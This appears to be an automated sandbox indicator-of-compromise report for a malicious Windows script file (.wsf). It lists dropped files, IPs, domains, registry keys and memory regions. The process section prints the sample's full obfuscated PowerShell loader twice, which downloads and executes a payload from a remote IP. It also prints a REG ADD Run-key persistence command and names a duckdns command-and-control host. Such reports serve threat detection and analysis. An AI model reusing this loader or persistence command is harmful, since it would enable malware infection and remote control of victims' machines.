IOC Report
rOferta_SKGNMECLemnedefinitionen353523577.wsf

loading gif

Files

File Path
Type
Category
Malicious
rOferta_SKGNMECLemnedefinitionen353523577.wsf
XML 1.0 document, ASCII text, with very long lines (336), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Roaming\mvourhjs.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55dvwptc.llq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m4xp1nt5.3em.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uito114p.1i1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zoco44qv.bpu.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Sneglefart.Glo
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\rOferta_SKGNMECLemnedefinitionen353523577.wsf"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'Flex$B.rggJentlMatroAnkybSigraKommlSk,l:ChesNtripeImpodTugtlTernaBraig Pirt Mar=Lab.(StanTRidge Fres S mtTotr-We dPs laaNonetSov htame M.tr$Dis,Oevanv,heieTmm rOpstf F.oeDiseaRoomrRubefWarluSodalBa lnTviveEndos Pins Sth7supe9Gru.) U.d ');while (!$Nedlagt) {Bussemnd (Sarpedon ' For$CajugPiral rihoAnstbCampaRhodl and:tidsJ Fe eSissrDragnH stgpro,iDelstPolttPon eDocorVidesEksteTernnFor gSv.neSolen AnceMe a=Cog.$ B it SchrSrstu PepeRed, ') ;Bussemnd $fantasises;Bussemnd (Sarpedon 'StatS WortByggaxen.r ,tat Rej-PokeSTumol aueRefreSmaapOnom Lsm.4Demo ');Bussemnd (Sarpedon ',roi$Tyf gmuzzlAnfao.ptib SonaCocclS,iv:SyssNShrieMed dF,eklOmflaappegA.but lem=Raag(Pse.TConseAnnss Duetgast-DeliPFoneaKapitA.kehhusk Dy.k$ proODiskvImmueHundrSub,fmilieUninaHei rGoalf ,efu,rbelPensnNe rebedss.pers.osn7tach9Mona) De ') ;Bussemnd (Sarpedon ' Bis$ ontg cutlPoecojgerbTrekaDaimlRegr:SlgtS FruyGildn.ulpiTof,nTubbgYohisApadh NedaMnstlmisclLyseeBelerCommnDia,eTynd=B ne$EucrgAfstllunaoEndob YaraChail fe,:Ta,dKMor,abraveDeltmR.gnpBegrehelboSnipeAntir.uncnBygge Lav+Chad+Hypo%M rg$PereSFl pt StarRingeT,ppnSkbngStr eBestkIsraoDi.qr Hete rdnN ale Kap.BlokcTommoTempu UmanDdfdt Cam ') ;$skppeskn=$Strengekorene[$Syningshallerne];}Bussemnd (Sarpedon 'Shal$DespgCorol FodoNonpb AbdaSemilmoda: TviCFortoAbsemvi.upS,leoParanModieSupen KirtHi maChecl rav .os=Cory LaroGSlogeOenst Com-MiceCEl.aoBemjn ,nttLefteSt.mnTr.btOrds Ditm$AcoeOStrevEpiceJoggrudstfBereeVensaH,ndrH.idfalaruBetilViabnVindeR,ffscoprs,eka7Fore9 Fle ');Bussemnd (Sarpedon ' Uni$ mycgin slMiniolivebFl ea UnelTand:R.liO VisvIsoleDek.rSocisLnpaeC lln slisUdsgiZo.rbAfs.l.ugmeLdre Coun=Lave Marl[UndeSCreayG.nes ,fstPl.seNglem.lev..oluC .uboSovjn.onivCypre OxirPa,ttSkov]foed:Omsk: garFFordrPillo ThemAphoBOxycaJ,nnsButtePape6card4 .msSTjentEfterForsiCalan AntgWhos(Iagt$ KakCChanoHeuamUntrp Couo Ma nEgnseB.ugn Plat S.raForrl .om)Real ');Bussemnd (Sarpedon 'Invu$ bifg Su,lPar,oTritbparaaVejblAn e:GodtNcurioSkamnThi,d GeniJulelUnsiaEcontFrenaStrkbMattlOut e Hor Skor= Skj Dite[FornSThioyhiersDi.it lite Aurmford.Did TLayseDelixP.ritTomo. CorECon.n.lencPlotoFuncdPyrgi Fl nI.eagA.ti]Kryd:Star: lokABoobSParsCMo,eI Ly,IOpt,.PedeGRuthepanct StiSAurotPublr AmbiNonbnIch g Bef(Chyl$.andOSkyfvFrijePinkr .jes DiaeLouvn omps.amoi,houbDe tl B teIsoc)Genu ');Bussemnd (Sarpedon ' Pen$Provg.laylImproLibebTryka s rlInte:Cen DSkovaAscacoutftUbesy UnplAnaloMaimn EksovermmR,styLavi2Lu.r0Deni4Gul,=Stop$UredNMakaoGor.nK.lidRo.tiSy tlSo.aaNonitE,teaReprb NonlParaeN.bl.De isi.dau DiabStibsB.llt manr N,ni He nSureg Nem(Takk2 sti8Absa0Vire4,ami5Equi6Forl, Boo2 L.p7 The2 Kli2skgl5 .ag)Frui ');Bussemnd $Dactylonomy204;"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'Flex$B.rggJentlMatroAnkybSigraKommlSk,l:ChesNtripeImpodTugtlTernaBraig Pirt Mar=Lab.(StanTRidge Fres S mtTotr-We dPs laaNonetSov htame M.tr$Dis,Oevanv,heieTmm rOpstf F.oeDiseaRoomrRubefWarluSodalBa lnTviveEndos Pins Sth7supe9Gru.) U.d ');while (!$Nedlagt) {Bussemnd (Sarpedon ' For$CajugPiral rihoAnstbCampaRhodl and:tidsJ Fe eSissrDragnH stgpro,iDelstPolttPon eDocorVidesEksteTernnFor gSv.neSolen AnceMe a=Cog.$ B it SchrSrstu PepeRed, ') ;Bussemnd $fantasises;Bussemnd (Sarpedon 'StatS WortByggaxen.r ,tat Rej-PokeSTumol aueRefreSmaapOnom Lsm.4Demo ');Bussemnd (Sarpedon ',roi$Tyf gmuzzlAnfao.ptib SonaCocclS,iv:SyssNShrieMed dF,eklOmflaappegA.but lem=Raag(Pse.TConseAnnss Duetgast-DeliPFoneaKapitA.kehhusk Dy.k$ proODiskvImmueHundrSub,fmilieUninaHei rGoalf ,efu,rbelPensnNe rebedss.pers.osn7tach9Mona) De ') ;Bussemnd (Sarpedon ' Bis$ ontg cutlPoecojgerbTrekaDaimlRegr:SlgtS FruyGildn.ulpiTof,nTubbgYohisApadh NedaMnstlmisclLyseeBelerCommnDia,eTynd=B ne$EucrgAfstllunaoEndob YaraChail fe,:Ta,dKMor,abraveDeltmR.gnpBegrehelboSnipeAntir.uncnBygge Lav+Chad+Hypo%M rg$PereSFl pt StarRingeT,ppnSkbngStr eBestkIsraoDi.qr Hete rdnN ale Kap.BlokcTommoTempu UmanDdfdt Cam ') ;$skppeskn=$Strengekorene[$Syningshallerne];}Bussemnd (Sarpedon 'Shal$DespgCorol FodoNonpb AbdaSemilmoda: TviCFortoAbsemvi.upS,leoParanModieSupen KirtHi maChecl rav .os=Cory LaroGSlogeOenst Com-MiceCEl.aoBemjn ,nttLefteSt.mnTr.btOrds Ditm$AcoeOStrevEpiceJoggrudstfBereeVensaH,ndrH.idfalaruBetilViabnVindeR,ffscoprs,eka7Fore9 Fle ');Bussemnd (Sarpedon ' Uni$ mycgin slMiniolivebFl ea UnelTand:R.liO VisvIsoleDek.rSocisLnpaeC lln slisUdsgiZo.rbAfs.l.ugmeLdre Coun=Lave Marl[UndeSCreayG.nes ,fstPl.seNglem.lev..oluC .uboSovjn.onivCypre OxirPa,ttSkov]foed:Omsk: garFFordrPillo ThemAphoBOxycaJ,nnsButtePape6card4 .msSTjentEfterForsiCalan AntgWhos(Iagt$ KakCChanoHeuamUntrp Couo Ma nEgnseB.ugn Plat S.raForrl .om)Real ');Bussemnd (Sarpedon 'Invu$ bifg Su,lPar,oTritbparaaVejblAn e:GodtNcurioSkamnThi,d GeniJulelUnsiaEcontFrenaStrkbMattlOut e Hor Skor= Skj Dite[FornSThioyhiersDi.it lite Aurmford.Did TLayseDelixP.ritTomo. CorECon.n.lencPlotoFuncdPyrgi Fl nI.eagA.ti]Kryd:Star: lokABoobSParsCMo,eI Ly,IOpt,.PedeGRuthepanct StiSAurotPublr AmbiNonbnIch g Bef(Chyl$.andOSkyfvFrijePinkr .jes DiaeLouvn omps.amoi,houbDe tl B teIsoc)Genu ');Bussemnd (Sarpedon ' Pen$Provg.laylImproLibebTryka s rlInte:Cen DSkovaAscacoutftUbesy UnplAnaloMaimn EksovermmR,styLavi2Lu.r0Deni4Gul,=Stop$UredNMakaoGor.nK.lidRo.tiSy tlSo.aaNonitE,teaReprb NonlParaeN.bl.De isi.dau DiabStibsB.llt manr N,ni He nSureg Nem(Takk2 sti8Absa0Vire4,ami5Equi6Forl, Boo2 L.p7 The2 Kli2skgl5 .ag)Frui ');Bussemnd $Dactylonomy204;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"

URLs

Name
IP
Malicious
jgbours284hawara01.duckdns.org
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://geoplugin.net/json.gp
178.237.33.50
malicious
http://nuget.org/NuGet.exe
unknown
http://geoplugin.net/json.gpg
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://87.121.105.163/Belyves242.hhkXR
unknown
https://go.micro
unknown
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binPPv
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://87.121.105.163
unknown
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binm
unknown
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binFokusGulduelvalenza.it/DtExZZndAxdvvlCKCcIVF127.bi
unknown
http://geoplugin.net/json.gpw
unknown
https://github.com/Pester/Pester
unknown
http://87.121.105.163/Belyves242.hhk
87.121.105.163
http://geoplugin.net/
unknown
https://aka.ms/pscore6lB
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bini
unknown
http://87.121.105.163/Belyves242.hhkP
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://87.121.H
unknown
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
87.121.105.163
There are 17 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
jgbours284hawara01.duckdns.org
45.88.90.110
malicious
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
45.88.90.110
jgbours284hawara01.duckdns.org
Bulgaria
malicious
87.121.105.163
unknown
Bulgaria
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Weariest
Amperian
HKEY_CURRENT_USER\Environment
Impopular
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
exepath
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
licence
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
time
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
nyerhvervelsen
There are 10 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
8650000
direct allocation
page execute and read and write
malicious
99BB000
direct allocation
page execute and read and write
malicious
23D6A311000
trusted library allocation
page read and write
malicious
312C000
heap
page read and write
malicious
5AC6000
trusted library allocation
page read and write
malicious
7FFD34770000
trusted library allocation
page read and write
23D5B4AD000
trusted library allocation
page read and write
28AF000
stack
page read and write
23C5093B000
heap
page read and write
7266DEE000
stack
page read and write
23C4ECA5000
heap
page read and write
7620000
trusted library allocation
page read and write
23D72850000
heap
page read and write
6EC5000
heap
page read and write
86E0000
direct allocation
page read and write
23C50949000
heap
page read and write
6D40000
direct allocation
page read and write
23C50DDC000
heap
page read and write
23C4EE37000
heap
page read and write
23D5A852000
trusted library allocation
page read and write
23C4EE30000
heap
page read and write
4640000
heap
page readonly
7480000
trusted library allocation
page read and write
2C60000
heap
page read and write
23C50DC0000
heap
page read and write
73F8000
trusted library allocation
page read and write
8DF0000
direct allocation
page execute and read and write
2CF2000
trusted library allocation
page read and write
750E000
stack
page read and write
721C000
heap
page read and write
D6461DD000
stack
page read and write
23D58670000
heap
page read and write
23C5093C000
heap
page read and write
23C50924000
heap
page read and write
470E000
stack
page read and write
23D728F3000
heap
page read and write
7FFD34780000
trusted library allocation
page read and write
23D58645000
heap
page read and write
2D90000
heap
page read and write
7FFD34890000
trusted library allocation
page execute and read and write
23D5A126000
heap
page read and write
2C3E000
stack
page read and write
7FFD34970000
trusted library allocation
page read and write
2BE0000
heap
page read and write
2CC9000
trusted library allocation
page read and write
23D5A240000
heap
page execute and read and write
23C4EE35000
heap
page read and write
23C4EC9C000
heap
page read and write
23C4EBEA000
heap
page read and write
7FFD34940000
trusted library allocation
page execute and read and write
22120000
heap
page read and write
85ED000
stack
page read and write
7FFD34921000
trusted library allocation
page read and write
86D0000
direct allocation
page read and write
23D586DD000
heap
page read and write
23D5A290000
heap
page execute and read and write
23D7285E000
heap
page read and write
23C4EE3A000
heap
page read and write
23D58580000
heap
page read and write
23D726B1000
heap
page read and write
27AE000
stack
page read and write
23D5862B000
heap
page read and write
7FFD349A0000
trusted library allocation
page read and write
D6465FF000
stack
page read and write
23D58603000
heap
page read and write
23D7262D000
heap
page read and write
74CE000
stack
page read and write
23D5A067000
heap
page execute and read and write
7060000
heap
page read and write
23C50949000
heap
page read and write
23D58960000
trusted library allocation
page read and write
23C4EC24000
heap
page read and write
23D5862D000
heap
page read and write
2D0C000
heap
page read and write
23D59FC0000
trusted library allocation
page read and write
7FFD349D0000
trusted library allocation
page read and write
23D5BF19000
trusted library allocation
page read and write
23D6A2B0000
trusted library allocation
page read and write
23C4EC24000
heap
page read and write
31F0000
heap
page read and write
7440000
trusted library allocation
page read and write
23C50968000
heap
page read and write
82CC000
stack
page read and write
23C4ECAB000
heap
page read and write
23D58975000
heap
page read and write
23D58631000
heap
page read and write
7FFD3482C000
trusted library allocation
page execute and read and write
5C2B000
remote allocation
page execute and read and write
7FFD34A60000
trusted library allocation
page read and write
7FFD34930000
trusted library allocation
page execute and read and write
23C4EB80000
heap
page read and write
23C50A81000
heap
page read and write
7FFD34A70000
trusted library allocation
page read and write
27C0000
heap
page read and write
23C4ECDC000
heap
page read and write
23C50920000
heap
page read and write
7FFD34A10000
trusted library allocation
page read and write
267D000
stack
page read and write
23D5A115000
heap
page read and write
23D5AAA2000
trusted library allocation
page read and write
23C50949000
heap
page read and write
8027000
stack
page read and write
2478B154000
heap
page read and write
23C4ECBC000
heap
page read and write
6DA0000
direct allocation
page read and write
22580000
direct allocation
page read and write
46C0000
heap
page execute and read and write
23D72648000
heap
page read and write
6D70000
direct allocation
page read and write
7470000
trusted library allocation
page read and write
6E50000
direct allocation
page read and write
80E0000
heap
page read and write
6C9E000
stack
page read and write
2D00000
heap
page read and write
6DC0000
direct allocation
page read and write
23C4ECDC000
heap
page read and write
72AF000
heap
page read and write
23D72770000
heap
page read and write
23C50978000
heap
page read and write
30B8000
heap
page read and write
23C50DDC000
heap
page read and write
13D000
stack
page read and write
7FFD34A80000
trusted library allocation
page read and write
6E2E000
stack
page read and write
AD4E7FD000
stack
page read and write
EC0000
heap
page read and write
7630000
trusted library allocation
page read and write
AD4E1FE000
stack
page read and write
27C8000
stack
page read and write
23C4ECC2000
heap
page read and write
83DA000
heap
page read and write
8130000
trusted library allocation
page execute and read and write
8700000
direct allocation
page read and write
726717E000
stack
page read and write
2478B16A000
heap
page read and write
6DE0000
direct allocation
page read and write
86F0000
direct allocation
page read and write
46AC000
stack
page read and write
2B00000
heap
page read and write
7FFD34A30000
trusted library allocation
page read and write
7447000
trusted library allocation
page read and write
23C50D95000
heap
page read and write
23C509A9000
heap
page read and write
AD4E0FE000
stack
page read and write
23D72750000
heap
page read and write
23D725E2000
heap
page read and write
7FFD34A90000
trusted library allocation
page read and write
3116000
heap
page read and write
2CF0000
trusted library allocation
page read and write
AD4E9FE000
stack
page read and write
5AAF000
trusted library allocation
page read and write
AD4E4FE000
stack
page read and write
23C4ECDC000
heap
page read and write
7460000
trusted library allocation
page read and write
726737E000
stack
page read and write
A3BB000
direct allocation
page execute and read and write
2CD0000
heap
page read and write
23C50957000
heap
page read and write
23D72622000
heap
page read and write
23D5AAAD000
trusted library allocation
page read and write
23D725E7000
heap
page read and write
23C50D90000
heap
page read and write
23D59FF0000
trusted library allocation
page read and write
27F0000
heap
page read and write
6D6B000
stack
page read and write
2950000
heap
page read and write
23D728C0000
heap
page read and write
85A0000
trusted library allocation
page read and write
23D725E0000
heap
page read and write
75C0000
trusted library allocation
page read and write
8D77000
trusted library allocation
page read and write
7DF3FDF80000
trusted library allocation
page execute and read and write
7FFD34910000
trusted library allocation
page read and write
7FFD34AE0000
trusted library allocation
page read and write
838C000
stack
page read and write
2760000
heap
page read and write
23C4EC3A000
heap
page read and write
8040000
trusted library allocation
page execute and read and write
AD4E3FE000
stack
page read and write
23C4EBE0000
heap
page read and write
8710000
direct allocation
page read and write
23C4EC0B000
heap
page read and write
4F53000
trusted library allocation
page read and write
2CBD000
trusted library allocation
page execute and read and write
80CD000
stack
page read and write
2A40000
heap
page read and write
8390000
heap
page read and write
2DD2000
heap
page read and write
48E0000
heap
page execute and read and write
6D50000
direct allocation
page read and write
23C4EC37000
heap
page read and write
23C4EC0C000
heap
page read and write
2CFF000
stack
page read and write
AD4E5FF000
stack
page read and write
7FFD3477D000
trusted library allocation
page execute and read and write
8060000
trusted library allocation
page read and write
2289C000
stack
page read and write
5949000
trusted library allocation
page read and write
2EB0000
heap
page read and write
7FFD34AB0000
trusted library allocation
page read and write
23C4ECDC000
heap
page read and write
7FFD34952000
trusted library allocation
page read and write
23D5A117000
heap
page read and write
23D59FA0000
trusted library allocation
page read and write
7FFD34830000
trusted library allocation
page execute and read and write
23D5A711000
trusted library allocation
page read and write
83B0000
heap
page read and write
23D726B9000
heap
page read and write
23D5BA1E000
trusted library allocation
page read and write
23C4EE38000
heap
page read and write
2CB3000
trusted library allocation
page execute and read and write
2281B000
stack
page read and write
23C50949000
heap
page read and write
30B0000
heap
page read and write
86C0000
direct allocation
page read and write
482B000
remote allocation
page execute and read and write
7610000
trusted library allocation
page read and write
479E000
stack
page read and write
23C4EA80000
heap
page read and write
45B0000
trusted library allocation
page read and write
769C000
stack
page read and write
2285E000
stack
page read and write
7450000
trusted library allocation
page read and write
23D72890000
heap
page read and write
75F0000
trusted library allocation
page read and write
86A0000
direct allocation
page read and write
7FFD34772000
trusted library allocation
page read and write
23C4ECCC000
heap
page read and write
23D6A59A000
trusted library allocation
page read and write
23C4EC2E000
heap
page read and write
3154000
heap
page read and write
